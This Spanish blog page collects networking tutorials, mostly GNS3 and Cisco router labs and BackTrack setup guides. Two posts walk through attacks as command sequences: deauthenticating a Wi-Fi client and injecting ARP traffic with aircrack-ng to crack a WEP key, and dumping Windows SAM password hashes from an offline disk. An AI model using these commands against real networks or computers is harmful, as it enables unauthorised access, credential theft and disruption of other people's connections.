Seguridad y Redes

Tips, Video Tutoriales, Wifislax, VMware, Linux, GNS3, Eve-NG, CCNA, Cisco Routers, Switches

Conexión de GNS3 a Internet

Para conectar nuestro emulador GNS3 hacia internet, debemos de tener una interface de bucle invertido (Loopback) y una interface física, en este ejemplo lo realice con la interface wireless de mi laptop. En el video se muestran los pasos de realizar la configuración.

GNS3 >> Nuestra PC >> ADSL Router >> Internet


Router - FastEthernet0/0   > 192.168.137.2 255.255.255.0
Interface Loopback            > 192.168.137.1 255.255.255.0
Interface Wireless             > 192.168.1.102 255.255.255.0   >>  Default Gateway 192.168.1.254
La dirección IP de la interface wireless fue asignado por DHCP del Router Huawei EchoLife HG520c que tiene Default Gateway la IP 192.168.1.254.

Iniciamos GNS3, configuramos la interface Loopback e iniciamos el Router. Enseguida le configuramos la IP al Router y verificamos la conectividad con la interface Loopback.

R1#conf t
R1(config)#int f0/0
R1(config-if)#ip address 192.168.137.2 255.255.255.0
R1(config-if)#no shut
R1(config-if)#end
R1#ping 192.168.137.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.137.1, timeout is 2 seconds:
.!!!!
Success rate is 80 percent (4/5), round-trip min/avg/max = 4/30/80 ms
R1#
R1#conf t
R1(config)#ip route 0.0.0.0 0.0.0.0 192.168.137.1
R1(config)#end
R1#ping 192.168.1.102
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.1.102, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 4/16/52 ms
R1#ping 192.168.1.254
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.1.254, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 4/30/96 ms
R1#ping www.google.com
Translating "www.google.com"
% Unrecognized host or address, or protocol not running.

R1#conf t
R1(config)#ip domain-lookup
R1(config)#ip name-server 192.168.1.254
R1(config)#do ping www.google.com

Translating "www.google.com"...domain server (192.168.1.254) [OK]
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 74.125.227.146, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 52/135/208 ms

R1(config)#do ping www.google.com
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 74.125.227.146, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 60/108/180 ms

Video Conexión de GNS3 a Internet


Vídeo Online:
https://youtu.be/EFCiHjVNxns?hd=1

Este video muestra como configurar un Servidor DHCP en un Router Cisco. El laboratorio se realizo con el simulador GNS3, con una topologia basica utilizando un router como cliente y otro con el modulo NM-16ESW, una interface loopback y qemu host.

Vídeo Configuración del Servidor DHCP en un Router Cisco.
Video Online:
https://www.youtube.com/watch?v=wNa95REmJxc

Agregar Qemu Host (MicroCore) en GNS3

Qemu Host es una imagen de linea de comando CLI (Microcore) o bien una imagen GUI (Tinycore). Es básicamente una pequeña imagen de Linux que puede ser utilizado para realizar algunas tareas básicas de conectividad como por ejemplo telnel, ssh, route iptables, tcpdump y también soporta IPV6. En este pequeño tutorial se mostrara el proceso de como agregar la imagen de Qemu Host a GNS3.

Herramientas
1. Lo primero que haremos es abrir GNS3 y nos vamos a la opcion de Qemu Host.
Editar - Preferencias - Qemu - Qemu Host
2. Configuramos la topologia de Red

3.Iniciamos el Switch y le configuramos una IP para realizar una prueba de conectividad.

4. Iniciamos Qemu Host y le configuramos una IP.

5. Realizamos la conectividad entre el Switch y Qemu host.

Configurar Default Gateway en Qemu
route add default gw 10.10.10.1
Video Tutorial GNS3: Agregar Qemu Host (MicroCore)

Vídeo Online
https://www.youtube.com/watch?v=6hc5A_qKUGY

En este vide se muestra el ataque 0 - Deautenticación para desasociar un cliente conectado al punto de acceso y asi obtener la clave WEP (Wired Equivalent Privacy) de la red inalambrica. El objetivo principal de los paquetes de deautenticación es interrumpir-romper la asociacion entre el cliente conectadioy el AP (Access Point). El ataque 0 o de Deautenticación (--deauth) es también conocido como el ataque DoS (Denegacion de Servicio), pero no es el propósito del vídeo.

Ataque 0: Deautenticación
Ataque 3: Reinyección de una petición ARP (ARP-request)
Estos pasos también se puede revisar en el post anterior.

Herramientas
* Backtrack 4 R2
http://www.backtrack-linux.org/downloads/
* Aircrack-ng (incluida en BackTrack)
http://www.aircrack-ng.org/
* Tarjeta WiFi que soporte el modo Monitor y la Inyección de paquetes

Comandos
root@bt:~# airmon-ng start wlan0

root@bt:~# airodump-ng mon0

root@bt:~# airodump-ng --bssid 00:18:3F:18:85:C9 --channel 6 --write captura mon0

root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0

root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0

root@bt:~# aircrack-ng captura-01.cap
Vídeo Online
http://youtu.be/jUeBo2qBNJg?hd=1

Este vídeo muestra como configurar SSH (Secure SHell) en un router, utilizando el simulador gráfico GNS3. En resumen, lo primero es configurarle un hostname al router y establecer un nombre de dominio. Estos detalles son necesarios para generar las claves rsa, una vez terminado de generar las claves, después solo toca configurar algunos detalles adicionales como el configurar el tiempo de inactividad para la sesión, el numero de veces que uno puede fallar al intentarse logearse, crear un nombre de usuario con su respectiva contraseña y también los protocolos permitidos para entrar por las lineas VTY. Por ultimo se realiza la prueba iniciando sesión SSH desde PuTTY.

Comandos
R1> enable
R1# configure terminal
R1(config)# int f0/0
R1(config-if)# ip address 192.168.1.1 255.255.255.0
R1(config-if)# no shut
R1(config-if)# end
R1# show ip int brief
R1# ping 192.168.1.2
R1# conf t
R1(config)# enable secret cisco
R1(config)# ip domain-name delfirosales.com
R1(config)# crypto key generate rsa general-keys modulus 1024
R1(config)# ip ssh time-out 60
R1(config)# ip ssh authentication-retries 3
R1(config)# line vty 0 4
R1(config-line)# login local
R1(config-line)# transport input ssh telnet
R1(config-line)# exit
R1(config)# username delfirosales password cisco
R1(config)# exit
R1# wr
Cliente SSH (PuTTY)
login as: delfirosales
Password: cisco
R1> enable
Password: cisco
R1# show ip int brief
R1# conf t
R1(config)# hostname delfirosales
delfirosales(config)# end
delfirosales# wr
Video Online
http://www.youtube.com/watch?v=YJIhk2gm2RA

Este vídeo muestra como auditar con el alfa 2W AWUS036NH utilizando BackTrack 4 R2, soporta diferentes tipos de ataque, el ataque chopchop, el ataque de fragmentación y en cuanto a inyección de trafico es excelente. Mi idea era utilizarlo solo para conectarme al router, ya que la mayoría de las personas que la poseían mencionaban que no soportaba modo monitor, soportaba con una live cd llamada beini. Pero como muestro en el video, BackTrack 4 R2 la reconoce automáticamente y si que soporta modo monitor, sin instalar ninguna parche o driver adicional.

En el vídeo se muestra el ataque de fragmentación (5), mostrado tambien en el post anterior.

Vídeo Online
http://www.youtube.com/watch?v=bpnKF1XBr1g

Ataque de Fragmentación con Alfa 2000mw (AWUS036NH)
http://delfirosales.blogspot.com/2011/02/alfa-2w-modo-monitor-awus036nh.html
Este vídeo muestra cómo instalar GNS3 en Ubuntu 10.10. GNS3 es un simulador gráfico de red que te permite diseñar topologías de red complejas y poner en marcha simulaciones sobre ellos.

GNS3 v0.7.3
http://www.gns3.net/download
Dynamips
http://www.ipflow.utc.fr/blog/?p=52

GNOME Terminal
gnome-terminal -t %d -e 'telnet %h %p' >/dev/null 2>&1 &

Video Online
http://www.youtube.com/watch?v=lqVfdOTFPgM

Interface Loopback + Cisco SDM (Security Device Manager) en GNS3

Este vídeo muestra como instalar una interface Loopback en Windows 7 y después realizar una conexión con un router simulado en GNS3. Tambien se muestra como configurar el router para poder acceder desde el Security Device Manager (SDM).

SDM (Security Device Manager) es una herramienta de configuración basada en el explorador web que simplifica la configuración y las funciones de seguridad de un router a través de asistentes de forma facil y rápida sin conocimientos de la interfaz de linea de comandos (CLI).

Comandos

Configurar una IP al Router y verifica el estado.
R1# configure terminal
R1(config)# interface FastEthernet0/0
R1(config-if)# ip address 192.168.1.6 255.255.255.0
R1(config-if)# no shutdown
R1(config-if)# exit
R1(config)# exit
R1# show ip interface brief
Habilitamos el HTTP en el Router y creamos un usuario con sus respectivos privilegios
R1# configure terminal
R1(config)# ip http server
R1(config)# ip http secure-server
R1(config)# username delfirosales password cisco123
R1(config)# username delfirosales privilege 15
R1(config)# ip http authentication local
R1(config)# exit
R1# wr
Probando la Conectividad.
R1# ping 192.168.1.5

Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.1.5, timeout is 2 seconds:
.!!!!
Success rate is 80 percent (4/5), round-trip min/avg/max = 4/15/48 ms
Una vez probada la conectividad, podremos acceder al SDM desde el navegador.

Video Online
https://www.youtube.com/watch?v=8skBKbZzXP0

Este vídeo muestra cómo poner nuestro sistema BackTrack en español. El idioma que trae por defecto BackTrack es el ingles. Así que para pasarlo a español necesitamos descargar los paquetes del entorno KDE, lo primero que haremos es abrir la consola y teclear los siguientes comandos individualmente.

Comandos

root@bt:~# apt-get install language-pack-es
root@bt:~# apt-get install language-pack-es-base
root@bt:~# apt-get install language-pack-kde-es
root@bt:~# apt-get install language-pack-kde-es-base
root@bt:~# apt-get install language-support-es
root@bt:~# apt-get install language-support-translations-es
root@bt:~# apt-get install language-support-writing-es
root@bt:~# apt-get install kde-i18n-es

Al finalizar solo tendremos que configurar el idioma desde el menú "Settings" - "Regional & Accessibility" - "Country/Region & Language". Una vez configurado el idioma, por ultimo configuramos el Teclado desde el menú "Settings" - " Regional y Accesibilidad" - "Disposición del Teclado". Listo! con esto ya tendremos nuestro BackTrack totalmente en español.

Vídeo Online
http://www.youtube.com/watch?v=j3k8Q0NFzs4
Este vídeo muestra como instalar un conjunto de controladores y aplicaciones llamadas "VMware Tools" que aceleran notablemente el rendimiento de la maquina virtual es por eso muy importante instalar estas herramientas de VMware en el sistema virtualizado. Aquí se muestran los pasos para instalar los VMware Tools en BackTrack 4 r2, la version utilizada de VMware Workstation es la versión 7.1.2 build-301548.

Para instalar los VMware Tools solo tienes que localizarte en la carpeta donde los hallas descomprimido y ejecutar el siguiente comando.
./vmware-install.pl
En mi caso /root/vmware-tools-distrib
root@bt:~/vmware-tools-distrib# ./vmware-install.pl

Video Online
http://www.youtube.com/watch?v=GSiftUkH-Jw
Este vídeo muestra como instalar BackTrack 4 R2 en VMware Workstation, así como actualizarlo y alguno que otro ajuste mas. Estos pasos mostrados en este vídeo también puede ser de utilidad para instalar BackTrack en una maquina real.

Herramientas Utilizadas
  • BackTrack
  • VMware Workstation
BackTrack 4 R2 (bt4-r2.iso)
http://www.backtrack-linux.org/downloads/
VMware Workstation 7.1.2 build-301548
http://downloads.vmware.com/d/info/desktop_downloads/vmware_workstation/7_0

Comandos
root@bt:~# startx
root@bt:~# xrandr -s 1280x720 (comando opcional, es para aumentar la resolución de la pantalla)
bt login: root
Password: toor
root@bt:~# startx
root@bt:~# iwconfig
root@bt:~# dhclient eth0
root@bt:~# apt-get update
Video Online
http://www.youtube.com/watch?v=m038Ss07n-c

En este vídeo se muestra como instalar GNS3 en Windows 7, es el segundo vídeo de varios que quiero realizar para ayudar a los demás que tienen problemas con GNS3, después realizare algunos vídeos básicos sobre esta misma herramienta.

En resumen lo que se muestra en el video son los siguientes temas.
Video Online
http://www.youtube.com/watch?v=jdesSM5upAY

En este vídeo se muestra como crackear una contraseña en un sistema windows apagado o de igual manera puede servir con tener la imagen de dicho sistema. En resumen para crackear las contraseñas de Windows desde una imagen o partición debe cumplirse tres tareas principales.
  1. Obtener el Syskey (System key)
  2. Extraer los hashes del archivo SAM
  3. Crackear los hashes para determinar las contraseñas asociada
Video Online
http://www.youtube.com/watch?v=lK8GX_7Bek8

Herramientas
Comandos
root@bt:~# fdisk -l
root@bt:~# mkdir /mnt/windows
root@bt:~# mount /dev/hda1 /mnt/windows
root@bt:~# mount -t ntfs-3g /dev/sda1 /mnt/usb -o force
root@bt:~# cd /mnt/windows/WINDOWS/system32/config/
root@bt:/mnt/windows/WINDOWS/system32/config/# ls
root@bt:/mnt/windows/WINDOWS/system32/config/# cp SAM /mnt/usb
root@bt:/mnt/windows/WINDOWS/system32/config/# cp system /mnt/usb
root@bt:/mnt/windows/WINDOWS/system32/config/# cd /mnt/usb
root@bt:/mnt/usb# bkhive system key
root@bt:/mnt/usb# samdump2 ./system ./SAM > /mnt/usb/hashes.txt
root@bt:/mnt/usb# cat ./hashes.txt
root@bt:/mnt/usb# poweroff
En este vídeo muestro cómo solucionar un defecto de GNS3 cuando se crean proyectos y éste no guarda el archivo de configuración inicial o startup_config de un router Cisco.

Video On-line:
http://www.youtube.com/watch?v=LQ0W0oOLKhk

Commandos
R1#show run
R1#show ip interface brief
R1#configure terminal
R1(config)#hostname delfirosales
delfirosales(config)#interface f0/0
delfirosales(config-if)#no shutdown
delfirosales(config-if)#ip address 192.168.1.1 255.255.255.0
delfirosales(config-if)#end
delfirosales#show ip int brief
delfirosales#wr

En este video se muestra la solución al error lanzado en vmware sobre el driver rtl8187.
root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wlan0           RTL8187         rtl8187 - [phy0]SIOCSIFFLAGS: Unknown error 132

 (monitor mode enabled on mon0)

Video Solucion: Backtrack mode Monitor rtl8187 - SIOCSIFFLAGS: Unknown error 132


El archivo "blacklist" debe quedar de la siguiente manera
# This file lists those modules which we don't want to be loaded by
# alias expansion, usually so some other driver will be loaded for the
# device instead.

# evbug is a debug tool that should be loaded explicitly
blacklist evbug
blacklist pcspkr

# these drivers are very simple, the HID drivers are usually preferred
blacklist usbmouse
blacklist usbkbd

# replaced by e100
blacklist eepro100

# replaced by tulip
blacklist de4x5

# causes no end of confusion by creating unexpected network interfaces
blacklist eth1394

# snd_intel8x0m can interfere with snd_intel8x0, doesn't seem to support much
# hardware on its own (Ubuntu bug #2011, #6810)
blacklist snd_intel8x0m

# Conflicts with dvb driver (which is better for handling this device)
blacklist snd_aw2

# causes failure to suspend on HP compaq nc6000 (Ubuntu: #10306)
blacklist i2c_i801

# replaced by p54pci
blacklist prism54

# replaced by b43 and ssb.
blacklist bcm43xx

# most apps now use garmin usb driver directly (Ubuntu: #114565)
blacklist garmin_gps

# replaced by asus-laptop (Ubuntu: #184721)
blacklist asus_acpi

# low-quality, just noise when being used for sound playback, causes
# hangs at desktop session start (Ubuntu: #246969)
blacklist snd_pcsp
blacklist rt73
blacklist ath_pci
#blacklist r8187
blacklist rt3070sta
blacklist rt2870sta
blacklist arusb_lnx
blacklist ath_pci
#blacklist r8187
blacklist rt73
blacklist rtl8187
Archivo "blacklist" localizado en /etc/modprobe.d/blacklist